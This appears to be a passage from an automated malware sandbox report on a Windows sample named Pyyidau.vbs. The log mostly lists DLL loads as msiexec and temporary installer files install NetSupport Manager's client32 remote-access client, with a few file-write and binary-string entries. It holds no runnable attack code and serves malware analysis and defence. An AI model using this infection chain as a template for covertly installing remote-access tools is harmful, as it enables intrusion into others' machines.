                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSIF373.tmpSection loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSIF985.tmpSection loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: samlib.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: uxtheme.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: ntmarta.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: msasn1.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: devrtl.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: spinf.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: drvstore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: pciax.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: firewallapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dnsapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: iphlpapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwbase.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: firewallapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: dnsapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: iphlpapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwbase.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: windows.storage.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: wldp.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: profapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: propsys.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: linkinfo.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: ntshrui.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: srvcli.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: cscapi.dll
                                Source: C:\Windows\Installer\MSI1387.tmpSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: ntmarta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: edgegdi.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI23E6.tmpSection loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: firewallapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: websocket.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: edgegdi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcihooks.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: textshaping.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pciinv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msimg32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: oleacc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: storeinvdll.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windowscodecs.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mfc100u.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msxml6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: linkinfo.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: cscapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxdiagn.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d11.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: d3d12.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmmbase.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dxgi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wmiclnt.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: tapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winbrand.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Client32[1].iniJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: Pyyidau.vbsStatic file information: File size 8816052 > 1048576
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdbP source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: sfxcab.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113968442877.000000000A0DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.113930238948.0000000001002000.00000040.00000400.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\Release_unicode\Licence.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
